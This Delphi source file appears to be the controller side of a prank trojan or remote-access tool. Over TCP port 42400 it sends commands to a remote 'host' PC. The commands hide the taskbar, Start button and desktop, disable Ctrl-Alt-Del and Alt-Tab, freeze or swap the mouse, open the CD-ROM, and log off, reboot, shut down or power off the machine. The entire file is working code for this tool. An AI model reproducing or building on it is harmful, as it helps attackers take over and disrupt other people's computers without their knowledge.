unit Terminal;

interface

uses
  Windows, Messages, SysUtils, Classes, Graphics, Controls, Forms, Dialogs,
  Menus, StdCtrls, ComCtrls, WSocket, ExtCtrls, AHMTFadingLabel, TFlatButtonUnit;

type
  TfrmTerminal = class(TForm)
    StatusBar: TStatusBar;
    pnlTerminal: TPanel;
    Chat: TGroupBox;
    lblName: TLabel;
    lblMore: TLabel;
    lblShow: TLabel;
    lblReply: TLabel;
    Nick: TEdit;
    System: TGroupBox;
    Fun: TGroupBox;
    lblMonitor: TLabel;
    lblTaskbar: TLabel;
    lblStart: TLabel;
    lblClock: TLabel;
    lblDesktop: TLabel;
    lblCdrom: TLabel;
    lblCad: TLabel;
    lblCapslock: TLabel;
    lblSystray: TLabel;
    lblAlt: TLabel;
    Connection: TGroupBox;
    Host: TEdit;
    Mouse: TGroupBox;
    lblPoint: TLabel;
    lblSwap: TLabel;
    Options: TGroupBox;
    Client: TWSocket;
    lblTitle: TLabel;
    cmdChat: TFlatButton;
    cmdScw: TFlatButton;
    cmdSrb: TFlatButton;
    cmdConnect: TFlatButton;
    cmdPing: TFlatButton;
    cmdLog: TFlatButton;
    cmdShut: TFlatButton;
    cmdBoot: TFlatButton;
    cmdOff: TFlatButton;
    cmdExit: TFlatButton;
    cmdNotes: TFlatButton;
    cmdPoint: TFlatButton;
    cmdSwap: TFlatButton;
    cmdFreeze: TFlatButton;
    cmdSystray: TFlatButton;
    cmdStart: TFlatButton;
    cmdClock: TFlatButton;
    cmdCdrom: TFlatButton;
    cmdCad: TFlatButton;
    cmdTaskbar: TFlatButton;
    cmdDesktop: TFlatButton;
    cmdMonitor: TFlatButton;
    cmdCapslock: TFlatButton;
    cmdAlt: TFlatButton;
    cmdMin: TFlatButton;
    cmdClose: TFlatButton;
    Fader: TAHMFadingLabel;
    Fader2: TAHMFadingLabel;
    cmdConsole: TFlatButton;
    procedure ClientDataAvailable(Sender: TObject; Error: Word);
    procedure ClientSessionClosed(Sender: TObject; Error: Word);
    procedure ClientSessionConnected(Sender: TObject; Error: Word);
    procedure ClientSendData(Sender: TObject; BytesSent: Integer);
    procedure ConnectTo(RemoteHost :String);
    procedure SetStatus(Status: String);
    procedure cmdCdromClick(Sender: TObject);
    procedure cmdConsoleClick(Sender: TObject);
    procedure cmdConnectClick(Sender: TObject);
    procedure cmdPingClick(Sender: TObject);
    procedure cmdSystrayClick(Sender: TObject);
    procedure cmdStartClick(Sender: TObject);
    procedure cmdClockClick(Sender: TObject);
    procedure cmdCadClick(Sender: TObject);
    procedure cmdTaskbarClick(Sender: TObject);
    procedure cmdDesktopClick(Sender: TObject);
    procedure cmdMonitorClick(Sender: TObject);
    procedure cmdCapslockClick(Sender: TObject);
    procedure cmdChatClick(Sender: TObject);
    procedure cmdScwClick(Sender: TObject);
    procedure cmdSrbClick(Sender: TObject);
    procedure cmdLogClick(Sender: TObject);
    procedure cmdBootClick(Sender: TObject);
    procedure cmdShutClick(Sender: TObject);
    procedure cmdOffClick(Sender: TObject);
    procedure cmdAltClick(Sender: TObject);
    procedure cmdPointClick(Sender: TObject);
    procedure cmdSwapClick(Sender: TObject);
    procedure cmdFreezeClick(Sender: TObject);
    procedure cmdExitClick(Sender: TObject);
    procedure cmdNotesClick(Sender: TObject);
    procedure cmdMinClick(Sender: TObject);
    procedure cmdCloseClick(Sender: TObject);
    procedure FaderClick(Sender: TObject);
  private
    { Private declarations }
    Buffer: array [0..1023] of Char;
    Count: Integer;
    procedure WMNCHitTest(var Msg : TMessage); message WM_NCHITTEST;
  public
    { Public declarations }
  end;

var
  frmTerminal: TfrmTerminal;
  Connecting, Connected: Boolean;
  RemoteIP: String;

implementation

uses Console, Chat, Load, About, Notes;

{$R *.DFM}

procedure TfrmTerminal.WMNCHitTest(var Msg : TMessage);
begin
   if GetAsyncKeyState(VK_LBUTTON) < 0 then
      Msg.Result := HTCAPTION
   else
      Msg.Result := HTCLIENT;
end;

procedure TfrmTerminal.cmdMinClick(Sender: TObject);
begin
   Application.Minimize;
end;

procedure TfrmTerminal.cmdCloseClick(Sender: TObject);
begin
   Application.Terminate;
end;

procedure TfrmTerminal.FaderClick(Sender: TObject);
begin
   frmAbout.Show;
end;

procedure TfrmTerminal.SetStatus(Status: String);
begin
   StatusBar.Panels[2].Text := Status;
   frmConsole.memConsole.Lines.Add(Status);
end;

procedure TfrmTerminal.ConnectTo(RemoteHost: String);
begin
   if Client.State <> wsClosed then
      begin
         if MessageDlg('Break the current connection?', mtConfirmation,
         [mbYes, mbNo], 0) = mrNo then
            Exit;
            SetStatus('Closing current connection...');
            Client.Abort;
      end
   else
   if RemoteHost = '' then
      begin
         SetStatus('Bad IP address encountered.');
         Connected := False;
         Exit;
      end;

   RemoteHost := Host.Text;
   RemoteIP:= RemoteHost;

   StatusBar.Panels[0].Text := '0';
   StatusBar.Panels[1].Text := '0';
   SetStatus('Connecting to ' + RemoteHost + '...');

   Client.Port := '42400';
   Client.Addr := RemoteHost;
   Client.Proto := 'tcp';
   Connecting := True;
   Client.Connect;
end;

procedure TfrmTerminal.ClientDataAvailable(Sender: TObject; Error: Word);
var
  Len: Integer;
  I: Integer;
begin
   Len := Client.Receive(@Buffer[Count], SizeOf(Buffer) - Count - 1);
      if Len <= 0 then
         Exit;

      Count := Count + Len;
      Buffer[Count] := #0;

      while TRUE do
         begin
            I := 0;
            while (I < Count) and (Buffer[I] <> #10) do
               Inc(I);
                  if I >= Count then
                     Exit;
                     SetStatus(Copy(StrPas(Buffer), 1, I));
                     StatusBar.Panels[1].Text := IntToStr(StrToInt(StatusBar.Panels[1].Text) +
                     Length(Copy(StrPas(Buffer), 1, I)));
                     Count := 0;
                  if I >= Integer(StrLen(Buffer)) then
                     Break;
                  Move(Buffer[I + 1], Buffer, Integer(Strlen(Buffer)) - I);
                  Count := StrLen(Buffer);
         end;
end;

procedure TfrmTerminal.ClientSessionClosed(Sender: TObject; Error: Word);
begin
   if not Connecting then
      begin
         SetStatus('Disconnected from ' + RemoteIP);
         frmChat.Hide;
         Connected := False;
         cmdConnect.Caption := 'Connect';
      end;
end;

procedure TfrmTerminal.ClientSessionConnected(Sender: TObject;
  Error: Word);
begin
   if Error = 0 then
      begin
         Connecting := False;
         Connected := True;
         SetStatus('Connected to ' + RemoteIP);
      end
   else
      begin
         cmdConnect.Caption := 'Connect';
         SetStatus('Couldn''t connect to ' + RemoteIP);
         RemoteIP := '';
      end;
end;

procedure TfrmTerminal.ClientSendData(Sender: TObject; BytesSent: Integer);
begin
   StatusBar.Panels[0].Text := IntToStr(StrToInt(StatusBar.Panels[0].Text) +
   BytesSent);
end;
//Connection Options
procedure TfrmTerminal.cmdConnectClick(Sender: TObject);
begin
   if cmdConnect.Caption = 'Connect' then
      begin
         ConnectTo(Host.Text);
         cmdConnect.Caption := 'Disconnect';
      end
   else
      begin
         if Connecting then
            SetStatus('Connection was aborted.');
            cmdConnect.Caption := 'Connect';
            Client.Abort;
      end;
end;

procedure TfrmTerminal.cmdPingClick(Sender: TObject);
begin
   if Connected then
      begin
         SetStatus('Pinging server...');
         Client.SendStr('PING!' + #13#10);
      end
   else
      SetStatus('Not connected.');
end;
//Fun Stuff
procedure TfrmTerminal.cmdSystrayClick(Sender: TObject);
begin
   if Connected then
      begin
         if cmdSystray.Caption = 'Show' then
            begin
               SetStatus('Showing system tray...');
               Client.SendStr('SST' + #13#10);
               cmdSystray.Caption := 'Hide';
            end
         else
            begin
               SetStatus('Hiding system tray...');
               Client.SendStr('HST' + #13#10);
               cmdSystray.Caption := 'Show';
            end;
      end
   else
      SetStatus('Not connected.');
end;

procedure TfrmTerminal.cmdStartClick(Sender: TObject);
begin
   if Connected then
      begin
         if cmdStart.Caption = 'Show' then
            begin
               SetStatus('Showing start button...');
               Client.SendStr('SSB' + #13#10);
               cmdStart.Caption := 'Hide';
            end
         else
            begin
               SetStatus('Hiding start button...');
               Client.SendStr('HSB' + #13#10);
               cmdStart.Caption := 'Show';
            end;
      end
   else
      SetStatus('Not connected.');
end;

procedure TfrmTerminal.cmdClockClick(Sender: TObject);
begin
   if Connected then
      begin
         if cmdClock.Caption = 'Show' then
            begin
               SetStatus('Showing system clock...');
               Client.SendStr('SSC' + #13#10);
               cmdClock.Caption := 'Hide';
            end
         else
            begin
               SetStatus('Hiding system clock...');
               Client.SendStr('HSC' + #13#10);
               cmdClock.Caption := 'Show';
            end;
      end
   else
      SetStatus('Not connected.');
end;

procedure TfrmTerminal.cmdCdromClick(Sender: TObject);
begin
   if Connected then
      begin
         if cmdCdrom.Caption = 'Open' then
            begin
               SetStatus('Opening CD-ROM door...');
               Client.SendStr('CDO' + #13#10);
               cmdCdrom.Caption := 'Close';
            end
         else
            begin
               SetStatus('Closing CD-ROM door...');
               Client.SendStr('CDC' + #13#10);
               cmdCdrom.Caption := 'Open';
            end;
      end
   else
      SetStatus('Not connected.');
end;

procedure TfrmTerminal.cmdCadClick(Sender: TObject);
begin
   if Connected then
      begin
         if cmdCad.Caption = 'On' then
            begin
               SetStatus('Enabling Ctrl-Alt-Del...');
               Client.SendStr('ECA' + #13#10);
               cmdCad.Caption := 'Off';
            end
         else
            begin
               SetStatus('Disabling Ctrl-Alt-Del...');
               Client.SendStr('DCA' + #13#10);
               cmdCad.Caption := 'On';
            end;
      end
   else
      SetStatus('Not connected.');
end;

procedure TfrmTerminal.cmdTaskbarClick(Sender: TObject);
begin
   if Connected then
      begin
         if cmdTaskbar.Caption = 'Show' then
            begin
               SetStatus('Showing taskbar...');
               Client.SendStr('STB' + #13#10);
               cmdTaskbar.Caption := 'Hide';
            end
         else
            begin
               SetStatus('Hiding taskbar...');
               Client.SendStr('HTB' + #13#10);
               cmdTaskbar.Caption := 'Show';
            end;
      end
   else
      SetStatus('Not connected.');
end;

procedure TfrmTerminal.cmdDesktopClick(Sender: TObject);
begin
   if Connected then
      begin
         if cmdDesktop.Caption = 'Show' then
            begin
               SetStatus('Showing desktop...');
               Client.SendStr('SDT' + #13#10);
               cmdDesktop.Caption := 'Hide';
            end
         else
            begin
               SetStatus('Hiding desktop...');
               Client.SendStr('HDT' + #13#10);
               cmdDesktop.Caption := 'Show';
            end;
      end
   else
      SetStatus('Not connected.');
end;

procedure TfrmTerminal.cmdMonitorClick(Sender: TObject);
begin
   if Connected then
      begin
         if cmdMonitor.Caption = 'On' then
            begin
               SetStatus('Turning monitor on...');
               Client.SendStr('ETM' + #13#10);
               cmdMonitor.Caption := 'Off';
            end
         else
            begin
               SetStatus('Turning monitor off...');
               Client.SendStr('DTM' + #13#10);
               cmdMonitor.Caption := 'On';
            end;
      end
   else
      SetStatus('Not connected.');
end;

procedure TfrmTerminal.cmdCapslockClick(Sender: TObject);
begin
   if Connected then
      begin
         if cmdCapslock.Caption = 'On' then
            begin
               SetStatus('Turning caps lock on...');
               Client.SendStr('ECL' + #13#10);
               cmdCapslock.Caption := 'Off';
            end
         else
            begin
               SetStatus('Turning caps lock off...');
               Client.SendStr('DCL' + #13#10);
               cmdCapslock.Caption := 'On';
            end;
      end
   else
      SetStatus('Not connected.');
end;

procedure TfrmTerminal.cmdAltClick(Sender: TObject);
begin
   if Connected then
      begin
         if cmdAlt.Caption = 'On' then
            begin
               SetStatus('Turning Alt-Tab on...');
               Client.SendStr('EAT' + #13#10);
               cmdAlt.Caption := 'Off';
            end
         else
            begin
               SetStatus('Turning Alt-Tab off...');
               Client.SendStr('DAT' + #13#10);
               cmdAlt.Caption := 'On';
            end;
      end
   else
      SetStatus('Not connected.');
end;
//Chat
procedure TfrmTerminal.cmdChatClick(Sender: TObject);
begin
   if Connected then
      begin
         SetStatus('Starting chat session...');
         frmChat.Show;
         Client.SendStr('ECW' + #13#10);
      end
   else
      SetStatus('Not connected.');
end;

procedure TfrmTerminal.cmdScwClick(Sender: TObject);
begin
   if Connected then
      begin
         if cmdScw.Caption = 'Show' then
            begin
               SetStatus('Showing host''s message window...');
               Client.SendStr('SCW' + #13#10);
               cmdScw.Caption := 'Hide';
            end
         else
            begin
               SetStatus('Hiding host''s message window...');
               Client.SendStr('HCW' + #13#10);
               cmdScw.Caption := 'Show';
            end;
      end
   else
      SetStatus('Not connected.');
end;

procedure TfrmTerminal.cmdSrbClick(Sender: TObject);
begin
   if Connected then
      begin
         if cmdSrb.Caption = 'Show' then
            begin
               SetStatus('Showing host''s reply box...');
               Client.SendStr('SRB' + #13#10);
               cmdSrb.Caption := 'Hide';
            end
         else
            begin
               SetStatus('Hiding host''s reply box...');
               Client.SendStr('HRB' + #13#10);
               cmdSrb.Caption := 'Show';
            end;
      end
   else
      SetStatus('Not connected.');
end;
//Mouse
procedure TfrmTerminal.cmdPointClick(Sender: TObject);
begin
   if Connected then
      begin
         if cmdPoint.Caption = 'Show' then
            begin
               SetStatus('Showing host''s mouse pointer...');
               Client.SendStr('SMP' + #13#10);
               cmdPoint.Caption := 'Hide';
            end
         else
            begin
               SetStatus('Hiding host''s mouse pointer...');
               Client.SendStr('HMP' + #13#10);
               cmdPoint.Caption := 'Show';
            end;
      end
   else
      SetStatus('Not connected.');
end;

procedure TfrmTerminal.cmdSwapClick(Sender: TObject);
begin
   if Connected then
      begin
         if cmdSwap.Caption = 'Swap' then
            begin
               SetStatus('Swapping host''s mouse buttons...');
               Client.SendStr('SMB' + #13#10);
               cmdSwap.Caption := 'Un-swap';
            end
         else
            begin
               SetStatus('Un-swapping host''s mouse buttons...');
               Client.SendStr('UMB' + #13#10);
               cmdSwap.Caption := 'Swap';
            end;
      end
   else
      SetStatus('Not connected.');
end;

procedure TfrmTerminal.cmdFreezeClick(Sender: TObject);
begin
   if Connected then
      begin
         if cmdFreeze.Caption = 'Freeze' then
            begin
               SetStatus('Freezing host''s mouse...');
               Client.SendStr('FHM' + #13#10);
               cmdFreeze.Caption := 'Hide';
            end
         else
            begin
               SetStatus('Un-freezing host''s mouse...');
               Client.SendStr('UHM' + #13#10);
               cmdFreeze.Caption := 'Show';
            end;
      end
   else
      SetStatus('Not connected.');
end;
//System
procedure TfrmTerminal.cmdLogClick(Sender: TObject);
begin
   if Connected then
      begin
         SetStatus('Logging off host from host''s PC...');
         Client.SendStr('LOH' + #13#10);
      end
   else
      SetStatus('Not connected.');
end;

procedure TfrmTerminal.cmdBootClick(Sender: TObject);
begin
   if Connected then
      begin
         SetStatus('Rebooting host''s PC...');
         Client.SendStr('RBH' + #13#10);
      end
   else
      SetStatus('Not connected.');
end;

procedure TfrmTerminal.cmdShutClick(Sender: TObject);
begin
   if Connected then
      begin
         SetStatus('Shutting down windows on host''s PC...');
         Client.SendStr('SDH' + #13#10);
      end
   else
      SetStatus('Not connected.');
end;

procedure TfrmTerminal.cmdOffClick(Sender: TObject);
begin
   if Connected then
      begin
         SetStatus('Turning host''s PC power off...');
         Client.SendStr('POH' + #13#10);
      end
   else
      SetStatus('Not connected.');
end;
//Options
procedure TfrmTerminal.cmdConsoleClick(Sender: TObject);
begin
   if cmdConsole.Caption = '@' then
      begin
         frmConsole.Show;
         cmdConsole.Caption := '$';
      end
   else
      begin
         frmConsole.Hide;
         cmdConsole.Caption := '@';
      end;
end;

procedure TfrmTerminal.cmdExitClick(Sender: TObject);
begin
   Application.Terminate;
end;

procedure TfrmTerminal.cmdNotesClick(Sender: TObject);
begin
   frmNotes.Show;
end;

end.
